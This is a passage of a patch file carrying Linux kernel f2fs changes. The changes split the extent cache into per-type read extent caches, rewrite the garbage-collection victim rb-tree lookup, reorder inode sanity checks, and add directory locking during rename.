+ 	struct task_struct *atomic_write_task;	/* store atomic write task */
+-	struct extent_tree *extent_tree;	/* cached extent_tree entry */
++	struct extent_tree *extent_tree[NR_EXTENT_CACHES];
++					/* cached extent_tree entry */
+ 	struct inode *cow_inode;	/* copy-on-write inode for atomic write */
+ 
+ 	/* avoid racing between foreground op and gc */
+@@ -826,7 +847,7 @@ struct f2fs_inode_info {
+ 	loff_t original_i_size;		/* original i_size before atomic write */
+ };
+ 
+-static inline void get_extent_info(struct extent_info *ext,
++static inline void get_read_extent_info(struct extent_info *ext,
+ 					struct f2fs_extent *i_ext)
+ {
+ 	ext->fofs = le32_to_cpu(i_ext->fofs);
+@@ -834,7 +855,7 @@ static inline void get_extent_info(struct extent_info *ext,
+ 	ext->len = le32_to_cpu(i_ext->len);
+ }
+ 
+-static inline void set_raw_extent(struct extent_info *ext,
++static inline void set_raw_read_extent(struct extent_info *ext,
+ 					struct f2fs_extent *i_ext)
+ {
+ 	i_ext->fofs = cpu_to_le32(ext->fofs);
+@@ -842,17 +863,6 @@ static inline void set_raw_extent(struct extent_info *ext,
+ 	i_ext->len = cpu_to_le32(ext->len);
+ }
+ 
+-static inline void set_extent_info(struct extent_info *ei, unsigned int fofs,
+-						u32 blk, unsigned int len)
+-{
+-	ei->fofs = fofs;
+-	ei->blk = blk;
+-	ei->len = len;
+-#ifdef CONFIG_F2FS_FS_COMPRESSION
+-	ei->c_len = 0;
+-#endif
+-}
+-
+ static inline bool __is_discard_mergeable(struct discard_info *back,
+ 			struct discard_info *front, unsigned int max_len)
+ {
+@@ -872,41 +882,6 @@ static inline bool __is_discard_front_mergeable(struct discard_info *cur,
+ 	return __is_discard_mergeable(cur, front, max_len);
+ }
+ 
+-static inline bool __is_extent_mergeable(struct extent_info *back,
+-						struct extent_info *front)
+-{
+-#ifdef CONFIG_F2FS_FS_COMPRESSION
+-	if (back->c_len && back->len != back->c_len)
+-		return false;
+-	if (front->c_len && front->len != front->c_len)
+-		return false;
+-#endif
+-	return (back->fofs + back->len == front->fofs &&
+-			back->blk + back->len == front->blk);
+-}
+-
+-static inline bool __is_back_mergeable(struct extent_info *cur,
+-						struct extent_info *back)
+-{
+-	return __is_extent_mergeable(back, cur);
+-}
+-
+-static inline bool __is_front_mergeable(struct extent_info *cur,
+-						struct extent_info *front)
+-{
+-	return __is_extent_mergeable(cur, front);
+-}
+-
+-extern void f2fs_mark_inode_dirty_sync(struct inode *inode, bool sync);
+-static inline void __try_update_largest_extent(struct extent_tree *et,
+-						struct extent_node *en)
+-{
+-	if (en->ei.len > et->largest.len) {
+-		et->largest = en->ei;
+-		et->largest_updated = true;
+-	}
+-}
+-
+ /*
+  * For free nid management
+  */
+@@ -1670,14 +1645,7 @@ struct f2fs_sb_info {
+ 	struct mutex flush_lock;		/* for flush exclusion */
+ 
+ 	/* for extent tree cache */
+-	struct radix_tree_root extent_tree_root;/* cache extent cache entries */
+-	struct mutex extent_tree_lock;	/* locking extent radix tree */
+-	struct list_head extent_list;		/* lru list for shrinker */
+-	spinlock_t extent_lock;			/* locking extent lru list */
+-	atomic_t total_ext_tree;		/* extent tree count */
+-	struct list_head zombie_list;		/* extent zombie tree list */
+-	atomic_t total_zombie_tree;		/* extent zombie tree count */
+-	atomic_t total_ext_node;		/* extent info count */
++	struct extent_tree_info extent_tree[NR_EXTENT_CACHES];
+ 
+ 	/* basic filesystem units */
+ 	unsigned int log_sectors_per_block;	/* log2 sectors per block */
+@@ -1761,10 +1729,14 @@ struct f2fs_sb_info {
+ 	unsigned int segment_count[2];		/* # of allocated segments */
+ 	unsigned int block_count[2];		/* # of allocated blocks */
+ 	atomic_t inplace_count;		/* # of inplace update */
+-	atomic64_t total_hit_ext;		/* # of lookup extent cache */
+-	atomic64_t read_hit_rbtree;		/* # of hit rbtree extent node */
+-	atomic64_t read_hit_largest;		/* # of hit largest extent node */
+-	atomic64_t read_hit_cached;		/* # of hit cached extent node */
++	/* # of lookup extent cache */
++	atomic64_t total_hit_ext[NR_EXTENT_CACHES];
++	/* # of hit rbtree extent node */
++	atomic64_t read_hit_rbtree[NR_EXTENT_CACHES];
++	/* # of hit cached extent node */
++	atomic64_t read_hit_cached[NR_EXTENT_CACHES];
++	/* # of hit largest extent node in read extent cache */
++	atomic64_t read_hit_largest;
+ 	atomic_t inline_xattr;			/* # of inline_xattr inodes */
+ 	atomic_t inline_inode;			/* # of inline_data inodes */
+ 	atomic_t inline_dir;			/* # of inline_dentry inodes */
+@@ -2578,6 +2550,7 @@ static inline block_t __start_sum_addr(struct f2fs_sb_info *sbi)
+ 	return le32_to_cpu(F2FS_CKPT(sbi)->cp_pack_start_sum);
+ }
+ 
++extern void f2fs_mark_inode_dirty_sync(struct inode *inode, bool sync);
+ static inline int inc_valid_node_count(struct f2fs_sb_info *sbi,
+ 					struct inode *inode, bool is_inode)
+ {
+@@ -3865,9 +3838,17 @@ struct f2fs_stat_info {
+ 	struct f2fs_sb_info *sbi;
+ 	int all_area_segs, sit_area_segs, nat_area_segs, ssa_area_segs;
+ 	int main_area_segs, main_area_sections, main_area_zones;
+-	unsigned long long hit_largest, hit_cached, hit_rbtree;
+-	unsigned long long hit_total, total_ext;
+-	int ext_tree, zombie_tree, ext_node;
++	unsigned long long hit_cached[NR_EXTENT_CACHES];
++	unsigned long long hit_rbtree[NR_EXTENT_CACHES];
++	unsigned long long total_ext[NR_EXTENT_CACHES];
++	unsigned long long hit_total[NR_EXTENT_CACHES];
++	int ext_tree[NR_EXTENT_CACHES];
++	int zombie_tree[NR_EXTENT_CACHES];
++	int ext_node[NR_EXTENT_CACHES];
++	/* to count memory footprint */
++	unsigned long long ext_mem[NR_EXTENT_CACHES];
++	/* for read extent cache */
++	unsigned long long hit_largest;
+ 	int ndirty_node, ndirty_dent, ndirty_meta, ndirty_imeta;
+ 	int ndirty_data, ndirty_qdata;
+ 	unsigned int ndirty_dirs, ndirty_files, nquota_files, ndirty_all;
+@@ -3926,10 +3907,10 @@ static inline struct f2fs_stat_info *F2FS_STAT(struct f2fs_sb_info *sbi)
+ #define stat_other_skip_bggc_count(sbi)	((sbi)->other_skip_bggc++)
+ #define stat_inc_dirty_inode(sbi, type)	((sbi)->ndirty_inode[type]++)
+ #define stat_dec_dirty_inode(sbi, type)	((sbi)->ndirty_inode[type]--)
+-#define stat_inc_total_hit(sbi)		(atomic64_inc(&(sbi)->total_hit_ext))
+-#define stat_inc_rbtree_node_hit(sbi)	(atomic64_inc(&(sbi)->read_hit_rbtree))
++#define stat_inc_total_hit(sbi, type)		(atomic64_inc(&(sbi)->total_hit_ext[type]))
++#define stat_inc_rbtree_node_hit(sbi, type)	(atomic64_inc(&(sbi)->read_hit_rbtree[type]))
+ #define stat_inc_largest_node_hit(sbi)	(atomic64_inc(&(sbi)->read_hit_largest))
+-#define stat_inc_cached_node_hit(sbi)	(atomic64_inc(&(sbi)->read_hit_cached))
++#define stat_inc_cached_node_hit(sbi, type)	(atomic64_inc(&(sbi)->read_hit_cached[type]))
+ #define stat_inc_inline_xattr(inode)					\
+ 	do {								\
+ 		if (f2fs_has_inline_xattr(inode))			\
+@@ -4052,10 +4033,10 @@ void f2fs_update_sit_info(struct f2fs_sb_info *sbi);
+ #define stat_other_skip_bggc_count(sbi)			do { } while (0)
+ #define stat_inc_dirty_inode(sbi, type)			do { } while (0)
+ #define stat_dec_dirty_inode(sbi, type)			do { } while (0)
+-#define stat_inc_total_hit(sbi)				do { } while (0)
+-#define stat_inc_rbtree_node_hit(sbi)			do { } while (0)
++#define stat_inc_total_hit(sbi, type)			do { } while (0)
++#define stat_inc_rbtree_node_hit(sbi, type)		do { } while (0)
+ #define stat_inc_largest_node_hit(sbi)			do { } while (0)
+-#define stat_inc_cached_node_hit(sbi)			do { } while (0)
++#define stat_inc_cached_node_hit(sbi, type)		do { } while (0)
+ #define stat_inc_inline_xattr(inode)			do { } while (0)
+ #define stat_dec_inline_xattr(inode)			do { } while (0)
+ #define stat_inc_inline_inode(inode)			do { } while (0)
+@@ -4144,12 +4125,9 @@ void f2fs_leave_shrinker(struct f2fs_sb_info *sbi);
+ /*
+  * extent_cache.c
+  */
++bool sanity_check_extent_cache(struct inode *inode);
+ struct rb_entry *f2fs_lookup_rb_tree(struct rb_root_cached *root,
+ 				struct rb_entry *cached_re, unsigned int ofs);
+-struct rb_node **f2fs_lookup_rb_tree_ext(struct f2fs_sb_info *sbi,
+-				struct rb_root_cached *root,
+-				struct rb_node **parent,
+-				unsigned long long key, bool *left_most);
+ struct rb_node **f2fs_lookup_rb_tree_for_insert(struct f2fs_sb_info *sbi,
+ 				struct rb_root_cached *root,
+ 				struct rb_node **parent,
+@@ -4160,21 +4138,25 @@ struct rb_entry *f2fs_lookup_rb_tree_ret(struct rb_root_cached *root,
+ 		struct rb_node ***insert_p, struct rb_node **insert_parent,
+ 		bool force, bool *leftmost);
+ bool f2fs_check_rb_tree_consistence(struct f2fs_sb_info *sbi,
+-				struct rb_root_cached *root, bool check_key);
+-unsigned int f2fs_shrink_extent_tree(struct f2fs_sb_info *sbi, int nr_shrink);
+-void f2fs_init_extent_tree(struct inode *inode, struct page *ipage);
++				struct rb_root_cached *root);
++void f2fs_init_extent_tree(struct inode *inode);
+ void f2fs_drop_extent_tree(struct inode *inode);
+-unsigned int f2fs_destroy_extent_node(struct inode *inode);
++void f2fs_destroy_extent_node(struct inode *inode);
+ void f2fs_destroy_extent_tree(struct inode *inode);
+-bool f2fs_lookup_extent_cache(struct inode *inode, pgoff_t pgofs,
+-			struct extent_info *ei);
+-void f2fs_update_extent_cache(struct dnode_of_data *dn);
+-void f2fs_update_extent_cache_range(struct dnode_of_data *dn,
+-			pgoff_t fofs, block_t blkaddr, unsigned int len);
+ void f2fs_init_extent_cache_info(struct f2fs_sb_info *sbi);
+ int __init f2fs_create_extent_cache(void);
+ void f2fs_destroy_extent_cache(void);
+ 
++/* read extent cache ops */
++void f2fs_init_read_extent_tree(struct inode *inode, struct page *ipage);
++bool f2fs_lookup_read_extent_cache(struct inode *inode, pgoff_t pgofs,
++			struct extent_info *ei);
++void f2fs_update_read_extent_cache(struct dnode_of_data *dn);
++void f2fs_update_read_extent_cache_range(struct dnode_of_data *dn,
++			pgoff_t fofs, block_t blkaddr, unsigned int len);
++unsigned int f2fs_shrink_read_extent_tree(struct f2fs_sb_info *sbi,
++			int nr_shrink);
++
+ /*
+  * sysfs.c
+  */
+@@ -4244,9 +4226,9 @@ int f2fs_write_multi_pages(struct compress_ctx *cc,
+ 						struct writeback_control *wbc,
+ 						enum iostat_type io_type);
+ int f2fs_is_compressed_cluster(struct inode *inode, pgoff_t index);
+-void f2fs_update_extent_tree_range_compressed(struct inode *inode,
+-				pgoff_t fofs, block_t blkaddr, unsigned int llen,
+-				unsigned int c_len);
++void f2fs_update_read_extent_tree_range_compressed(struct inode *inode,
++				pgoff_t fofs, block_t blkaddr,
++				unsigned int llen, unsigned int c_len);
+ int f2fs_read_multi_pages(struct compress_ctx *cc, struct bio **bio_ret,
+ 				unsigned nr_pages, sector_t *last_block_in_bio,
+ 				bool is_readahead, bool for_write);
+@@ -4327,9 +4309,10 @@ static inline bool f2fs_load_compressed_page(struct f2fs_sb_info *sbi,
+ static inline void f2fs_invalidate_compress_pages(struct f2fs_sb_info *sbi,
+ 							nid_t ino) { }
+ #define inc_compr_inode_stat(inode)		do { } while (0)
+-static inline void f2fs_update_extent_tree_range_compressed(struct inode *inode,
+-				pgoff_t fofs, block_t blkaddr, unsigned int llen,
+-				unsigned int c_len) { }
++static inline void f2fs_update_read_extent_tree_range_compressed(
++				struct inode *inode,
++				pgoff_t fofs, block_t blkaddr,
++				unsigned int llen, unsigned int c_len) { }
+ #endif
+ 
+ static inline int set_compress_context(struct inode *inode)
+@@ -4400,26 +4383,6 @@ F2FS_FEATURE_FUNCS(casefold, CASEFOLD);
+ F2FS_FEATURE_FUNCS(compression, COMPRESSION);
+ F2FS_FEATURE_FUNCS(readonly, RO);
+ 
+-static inline bool f2fs_may_extent_tree(struct inode *inode)
+-{
+-	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-
+-	if (!test_opt(sbi, EXTENT_CACHE) ||
+-			is_inode_flag_set(inode, FI_NO_EXTENT) ||
+-			(is_inode_flag_set(inode, FI_COMPRESSED_FILE) &&
+-			 !f2fs_sb_has_readonly(sbi)))
+-		return false;
+-
+-	/*
+-	 * for recovered files during mount do not create extents
+-	 * if shrinker is not registered.
+-	 */
+-	if (list_empty(&sbi->s_list))
+-		return false;
+-
+-	return S_ISREG(inode->i_mode);
+-}
+-
+ #ifdef CONFIG_BLK_DEV_ZONED
+ static inline bool f2fs_blkz_is_seq(struct f2fs_sb_info *sbi, int devi,
+ 				    block_t blkaddr)
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index bf37983304a33..dbad2db68f1bc 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -618,7 +618,7 @@ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ 		 */
+ 		fofs = f2fs_start_bidx_of_node(ofs_of_node(dn->node_page),
+ 							dn->inode) + ofs;
+-		f2fs_update_extent_cache_range(dn, fofs, 0, len);
++		f2fs_update_read_extent_cache_range(dn, fofs, 0, len);
+ 		dec_valid_block_count(sbi, dn->inode, nr_free);
+ 	}
+ 	dn->ofs_in_node = ofs;
+@@ -1496,7 +1496,7 @@ static int f2fs_do_zero_range(struct dnode_of_data *dn, pgoff_t start,
+ 		f2fs_set_data_blkaddr(dn);
+ 	}
+ 
+-	f2fs_update_extent_cache_range(dn, start, 0, index - start);
++	f2fs_update_read_extent_cache_range(dn, start, 0, index - start);
+ 
+ 	return ret;
+ }
+@@ -2573,7 +2573,7 @@ static int f2fs_defragment_range(struct f2fs_sb_info *sbi,
+ 	struct f2fs_map_blocks map = { .m_next_extent = NULL,
+ 					.m_seg_type = NO_CHECK_TYPE,
+ 					.m_may_create = false };
+-	struct extent_info ei = {0, 0, 0};
++	struct extent_info ei = {0, };
+ 	pgoff_t pg_start, pg_end, next_pgofs;
+ 	unsigned int blk_per_seg = sbi->blocks_per_seg;
+ 	unsigned int total = 0, sec_num;
+@@ -2605,7 +2605,7 @@ static int f2fs_defragment_range(struct f2fs_sb_info *sbi,
+ 	 * lookup mapping info in extent cache, skip defragmenting if physical
+ 	 * block addresses are continuous.
+ 	 */
+-	if (f2fs_lookup_extent_cache(inode, pg_start, &ei)) {
++	if (f2fs_lookup_read_extent_cache(inode, pg_start, &ei)) {
+ 		if (ei.fofs + ei.len >= pg_end)
+ 			goto out;
+ 	}
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index aa928d1c81597..5cd19fdc10596 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -389,40 +389,95 @@ static unsigned int count_bits(const unsigned long *addr,
+ 	return sum;
+ }
+ 
+-static struct victim_entry *attach_victim_entry(struct f2fs_sb_info *sbi,
+-				unsigned long long mtime, unsigned int segno,
+-				struct rb_node *parent, struct rb_node **p,
+-				bool left_most)
++static bool f2fs_check_victim_tree(struct f2fs_sb_info *sbi,
++				struct rb_root_cached *root)
++{
++#ifdef CONFIG_F2FS_CHECK_FS
++	struct rb_node *cur = rb_first_cached(root), *next;
++	struct victim_entry *cur_ve, *next_ve;
++
++	while (cur) {
++		next = rb_next(cur);
++		if (!next)
++			return true;
++
++		cur_ve = rb_entry(cur, struct victim_entry, rb_node);
++		next_ve = rb_entry(next, struct victim_entry, rb_node);
++
++		if (cur_ve->mtime > next_ve->mtime) {
++			f2fs_info(sbi, "broken victim_rbtree, "
++				"cur_mtime(%llu) next_mtime(%llu)",
++				cur_ve->mtime, next_ve->mtime);
++			return false;
++		}
++		cur = next;
++	}
++#endif
++	return true;
++}
++
++static struct victim_entry *__lookup_victim_entry(struct f2fs_sb_info *sbi,
++					unsigned long long mtime)
++{
++	struct atgc_management *am = &sbi->am;
++	struct rb_node *node = am->root.rb_root.rb_node;
++	struct victim_entry *ve = NULL;
++
++	while (node) {
++		ve = rb_entry(node, struct victim_entry, rb_node);
++
++		if (mtime < ve->mtime)
++			node = node->rb_left;
++		else
++			node = node->rb_right;
++	}
++	return ve;
++}
++
++static struct victim_entry *__create_victim_entry(struct f2fs_sb_info *sbi,
++		unsigned long long mtime, unsigned int segno)
+ {
+ 	struct atgc_management *am = &sbi->am;
+ 	struct victim_entry *ve;
+ 
+-	ve =  f2fs_kmem_cache_alloc(victim_entry_slab,
+-				GFP_NOFS, true, NULL);
++	ve =  f2fs_kmem_cache_alloc(victim_entry_slab, GFP_NOFS, true, NULL);
+ 
+ 	ve->mtime = mtime;
+ 	ve->segno = segno;
+ 
+-	rb_link_node(&ve->rb_node, parent, p);
+-	rb_insert_color_cached(&ve->rb_node, &am->root, left_most);
+-
+ 	list_add_tail(&ve->list, &am->victim_list);
+-
+ 	am->victim_count++;
+ 
+ 	return ve;
+ }
+ 
+-static void insert_victim_entry(struct f2fs_sb_info *sbi,
++static void __insert_victim_entry(struct f2fs_sb_info *sbi,
+ 				unsigned long long mtime, unsigned int segno)
+ {
+ 	struct atgc_management *am = &sbi->am;
+-	struct rb_node **p;
++	struct rb_root_cached *root = &am->root;
++	struct rb_node **p = &root->rb_root.rb_node;
+ 	struct rb_node *parent = NULL;
++	struct victim_entry *ve;
+ 	bool left_most = true;
+ 
+-	p = f2fs_lookup_rb_tree_ext(sbi, &am->root, &parent, mtime, &left_most);
+-	attach_victim_entry(sbi, mtime, segno, parent, p, left_most);
++	/* look up rb tree to find parent node */
++	while (*p) {
++		parent = *p;
++		ve = rb_entry(parent, struct victim_entry, rb_node);
++
++		if (mtime < ve->mtime) {
++			p = &(*p)->rb_left;
++		} else {
++			p = &(*p)->rb_right;
++			left_most = false;
++		}
++	}
++
++	ve = __create_victim_entry(sbi, mtime, segno);
++
++	rb_link_node(&ve->rb_node, parent, p);
++	rb_insert_color_cached(&ve->rb_node, root, left_most);
+ }
+ 
+ static void add_victim_entry(struct f2fs_sb_info *sbi,
+@@ -458,19 +513,7 @@ static void add_victim_entry(struct f2fs_sb_info *sbi,
+ 	if (sit_i->dirty_max_mtime - mtime < p->age_threshold)
+ 		return;
+ 
+-	insert_victim_entry(sbi, mtime, segno);
+-}
+-
+-static struct rb_node *lookup_central_victim(struct f2fs_sb_info *sbi,
+-						struct victim_sel_policy *p)
+-{
+-	struct atgc_management *am = &sbi->am;
+-	struct rb_node *parent = NULL;
+-	bool left_most;
+-
+-	f2fs_lookup_rb_tree_ext(sbi, &am->root, &parent, p->age, &left_most);
+-
+-	return parent;
++	__insert_victim_entry(sbi, mtime, segno);
+ }
+ 
+ static void atgc_lookup_victim(struct f2fs_sb_info *sbi,
+@@ -480,7 +523,6 @@ static void atgc_lookup_victim(struct f2fs_sb_info *sbi,
+ 	struct atgc_management *am = &sbi->am;
+ 	struct rb_root_cached *root = &am->root;
+ 	struct rb_node *node;
+-	struct rb_entry *re;
+ 	struct victim_entry *ve;
+ 	unsigned long long total_time;
+ 	unsigned long long age, u, accu;
+@@ -507,12 +549,10 @@ static void atgc_lookup_victim(struct f2fs_sb_info *sbi,
+ 
+ 	node = rb_first_cached(root);
+ next:
+-	re = rb_entry_safe(node, struct rb_entry, rb_node);
+-	if (!re)
++	ve = rb_entry_safe(node, struct victim_entry, rb_node);
++	if (!ve)
+ 		return;
+ 
+-	ve = (struct victim_entry *)re;
+-
+ 	if (ve->mtime >= max_mtime || ve->mtime < min_mtime)
+ 		goto skip;
+ 
+@@ -554,8 +594,6 @@ static void atssr_lookup_victim(struct f2fs_sb_info *sbi,
+ {
+ 	struct sit_info *sit_i = SIT_I(sbi);
+ 	struct atgc_management *am = &sbi->am;
+-	struct rb_node *node;
+-	struct rb_entry *re;
+ 	struct victim_entry *ve;
+ 	unsigned long long age;
+ 	unsigned long long max_mtime = sit_i->dirty_max_mtime;
+@@ -565,25 +603,22 @@ static void atssr_lookup_victim(struct f2fs_sb_info *sbi,
+ 	unsigned int dirty_threshold = max(am->max_candidate_count,
+ 					am->candidate_ratio *
+ 					am->victim_count / 100);
+-	unsigned int cost;
+-	unsigned int iter = 0;
++	unsigned int cost, iter;
+ 	int stage = 0;
+ 
+ 	if (max_mtime < min_mtime)
+ 		return;
+ 	max_mtime += 1;
+ next_stage:
+-	node = lookup_central_victim(sbi, p);
++	iter = 0;
++	ve = __lookup_victim_entry(sbi, p->age);
+ next_node:
+-	re = rb_entry_safe(node, struct rb_entry, rb_node);
+-	if (!re) {
+-		if (stage == 0)
+-			goto skip_stage;
++	if (!ve) {
++		if (stage++ == 0)
++			goto next_stage;
+ 		return;
+ 	}
+ 
+-	ve = (struct victim_entry *)re;
+-
+ 	if (ve->mtime >= max_mtime || ve->mtime < min_mtime)
+ 		goto skip_node;
+ 
+@@ -609,24 +644,20 @@ next_node:
+ 	}
+ skip_node:
+ 	if (iter < dirty_threshold) {
+-		if (stage == 0)
+-			node = rb_prev(node);
+-		else if (stage == 1)
+-			node = rb_next(node);
++		ve = rb_entry(stage == 0 ? rb_prev(&ve->rb_node) :
++					rb_next(&ve->rb_node),
++					struct victim_entry, rb_node);
+ 		goto next_node;
+ 	}
+-skip_stage:
+-	if (stage < 1) {
+-		stage++;
+-		iter = 0;
++
++	if (stage++ == 0)
+ 		goto next_stage;
+-	}
+ }
++
+ static void lookup_victim_by_age(struct f2fs_sb_info *sbi,
+ 						struct victim_sel_policy *p)
+ {
+-	f2fs_bug_on(sbi, !f2fs_check_rb_tree_consistence(sbi,
+-						&sbi->am.root, true));
++	f2fs_bug_on(sbi, !f2fs_check_victim_tree(sbi, &sbi->am.root));
+ 
+ 	if (p->gc_mode == GC_AT)
+ 		atgc_lookup_victim(sbi, p);
+@@ -1147,7 +1178,7 @@ static int ra_data_block(struct inode *inode, pgoff_t index)
+ 	struct address_space *mapping = inode->i_mapping;
+ 	struct dnode_of_data dn;
+ 	struct page *page;
+-	struct extent_info ei = {0, 0, 0};
++	struct extent_info ei = {0, };
+ 	struct f2fs_io_info fio = {
+ 		.sbi = sbi,
+ 		.ino = inode->i_ino,
+@@ -1165,7 +1196,7 @@ static int ra_data_block(struct inode *inode, pgoff_t index)
+ 	if (!page)
+ 		return -ENOMEM;
+ 
+-	if (f2fs_lookup_extent_cache(inode, index, &ei)) {
++	if (f2fs_lookup_read_extent_cache(inode, index, &ei)) {
+ 		dn.data_blkaddr = ei.blk + index - ei.fofs;
+ 		if (unlikely(!f2fs_is_valid_blkaddr(sbi, dn.data_blkaddr,
+ 						DATA_GENERIC_ENHANCE_READ))) {
+diff --git a/fs/f2fs/gc.h b/fs/f2fs/gc.h
+index 19b956c2d697a..ca84024b9c9e7 100644
+--- a/fs/f2fs/gc.h
++++ b/fs/f2fs/gc.h
+@@ -55,20 +55,10 @@ struct gc_inode_list {
+ 	struct radix_tree_root iroot;
+ };
+ 
+-struct victim_info {
+-	unsigned long long mtime;	/* mtime of section */
+-	unsigned int segno;		/* section No. */
+-};
+-
+ struct victim_entry {
+ 	struct rb_node rb_node;		/* rb node located in rb-tree */
+-	union {
+-		struct {
+-			unsigned long long mtime;	/* mtime of section */
+-			unsigned int segno;		/* segment No. */
+-		};
+-		struct victim_info vi;	/* victim info */
+-	};
++	unsigned long long mtime;	/* mtime of section */
++	unsigned int segno;		/* segment No. */
+ 	struct list_head list;
+ };
+ 
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 229ddc2f7b079..aab3b8b3ab0a7 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -262,22 +262,6 @@ static bool sanity_check_inode(struct inode *inode, struct page *node_page)
+ 		return false;
+ 	}
+ 
+-	if (fi->extent_tree) {
+-		struct extent_info *ei = &fi->extent_tree->largest;
+-
+-		if (ei->len &&
+-			(!f2fs_is_valid_blkaddr(sbi, ei->blk,
+-						DATA_GENERIC_ENHANCE) ||
+-			!f2fs_is_valid_blkaddr(sbi, ei->blk + ei->len - 1,
+-						DATA_GENERIC_ENHANCE))) {
+-			set_sbi_flag(sbi, SBI_NEED_FSCK);
+-			f2fs_warn(sbi, "%s: inode (ino=%lx) extent info [%u, %u, %u] is incorrect, run fsck to fix",
+-				  __func__, inode->i_ino,
+-				  ei->blk, ei->fofs, ei->len);
+-			return false;
+-		}
+-	}
+-
+ 	if (f2fs_sanity_check_inline_data(inode)) {
+ 		set_sbi_flag(sbi, SBI_NEED_FSCK);
+ 		f2fs_warn(sbi, "%s: inode (ino=%lx, mode=%u) should not have inline_data, run fsck to fix",
+@@ -392,8 +376,6 @@ static int do_read_inode(struct inode *inode)
+ 	fi->i_pino = le32_to_cpu(ri->i_pino);
+ 	fi->i_dir_level = ri->i_dir_level;
+ 
+-	f2fs_init_extent_tree(inode, node_page);
+-
+ 	get_inline_info(inode, ri);
+ 
+ 	fi->i_extra_isize = f2fs_has_extra_attr(inode) ?
+@@ -415,12 +397,6 @@ static int do_read_inode(struct inode *inode)
+ 		fi->i_inline_xattr_size = 0;
+ 	}
+ 
+-	if (!sanity_check_inode(inode, node_page)) {
+-		f2fs_put_page(node_page, 1);
+-		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
+-		return -EFSCORRUPTED;
+-	}
+-
+ 	/* check data exist */
+ 	if (f2fs_has_inline_data(inode) && !f2fs_exist_data(inode))
+ 		__recover_inline_status(inode, node_page);
+@@ -479,6 +455,22 @@ static int do_read_inode(struct inode *inode)
+ 	}
+ 
+ 	init_idisk_time(inode);
++
++	/* Need all the flag bits */
++	f2fs_init_read_extent_tree(inode, node_page);
++
++	if (!sanity_check_inode(inode, node_page)) {
++		f2fs_put_page(node_page, 1);
++		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
++		return -EFSCORRUPTED;
++	}
++
++	if (!sanity_check_extent_cache(inode)) {
++		f2fs_put_page(node_page, 1);
++		f2fs_handle_error(sbi, ERROR_CORRUPTED_INODE);
++		return -EFSCORRUPTED;
++	}
++
+ 	f2fs_put_page(node_page, 1);
+ 
+ 	stat_inc_inline_xattr(inode);
+@@ -607,7 +599,7 @@ retry:
+ void f2fs_update_inode(struct inode *inode, struct page *node_page)
+ {
+ 	struct f2fs_inode *ri;
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[EX_READ];
+ 
+ 	f2fs_wait_on_page_writeback(node_page, NODE, true, true);
+ 	set_page_dirty(node_page);
+@@ -629,7 +621,7 @@ void f2fs_update_inode(struct inode *inode, struct page *node_page)
+ 
+ 	if (et) {
+ 		read_lock(&et->lock);
+-		set_raw_extent(&et->largest, &ri->i_ext);
++		set_raw_read_extent(&et->largest, &ri->i_ext);
+ 		read_unlock(&et->lock);
+ 	} else {
+ 		memset(&ri->i_ext, 0, sizeof(ri->i_ext));
+diff --git a/fs/f2fs/namei.c b/fs/f2fs/namei.c
+index b6c14c9c33a08..d879a295b688e 100644
+--- a/fs/f2fs/namei.c
++++ b/fs/f2fs/namei.c
+@@ -258,8 +258,6 @@ static struct inode *f2fs_new_inode(struct user_namespace *mnt_userns,
+ 	}
+ 	F2FS_I(inode)->i_inline_xattr_size = xattr_size;
+ 
+-	f2fs_init_extent_tree(inode, NULL);
+-
+ 	F2FS_I(inode)->i_flags =
+ 		f2fs_mask_flags(mode, F2FS_I(dir)->i_flags & F2FS_FL_INHERITED);
+ 
+@@ -282,6 +280,8 @@ static struct inode *f2fs_new_inode(struct user_namespace *mnt_userns,
+ 
+ 	f2fs_set_inode_flags(inode);
+ 
++	f2fs_init_extent_tree(inode);
++
+ 	trace_f2fs_new_inode(inode, 0);
+ 	return inode;
+ 
+@@ -1002,12 +1002,20 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			goto out;
+ 	}
+ 
++	/*
++	 * Copied from ext4_rename: we need to protect against old.inode
++	 * directory getting converted from inline directory format into
++	 * a normal one.
++	 */
++	if (S_ISDIR(old_inode->i_mode))
++		inode_lock_nested(old_inode, I_MUTEX_NONDIR2);
++
+ 	err = -ENOENT;
+ 	old_entry = f2fs_find_entry(old_dir, &old_dentry->d_name, &old_page);
+ 	if (!old_entry) {
+ 		if (IS_ERR(old_page))
+ 			err = PTR_ERR(old_page);
+-		goto out;
++		goto out_unlock_old;
+ 	}
+ 
+ 	if (S_ISDIR(old_inode->i_mode)) {
+@@ -1115,6 +1123,9 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 
+ 	f2fs_unlock_op(sbi);
+ 
++	if (S_ISDIR(old_inode->i_mode))
++		inode_unlock(old_inode);
++
+ 	if (IS_DIRSYNC(old_dir) || IS_DIRSYNC(new_dir))
+ 		f2fs_sync_fs(sbi->sb, 1);
+ 
+@@ -1129,6 +1140,9 @@ out_dir:
+ 		f2fs_put_page(old_dir_page, 0);
+ out_old:
+ 	f2fs_put_page(old_page, 0);
++out_unlock_old:
++	if (S_ISDIR(old_inode->i_mode))
++		inode_unlock(old_inode);
+ out:
+ 	iput(whiteout);
+ 	return err;
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index b9ee5a1176a07..07419c3e42a52 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -85,10 +85,12 @@ bool f2fs_available_free_memory(struct f2fs_sb_info *sbi, int type)
+ 						sizeof(struct ino_entry);
+ 		mem_size >>= PAGE_SHIFT;
+ 		res = mem_size < ((avail_ram * nm_i->ram_thresh / 100) >> 1);
+-	} else if (type == EXTENT_CACHE) {
+-		mem_size = (atomic_read(&sbi->total_ext_tree) *
++	} else if (type == READ_EXTENT_CACHE) {
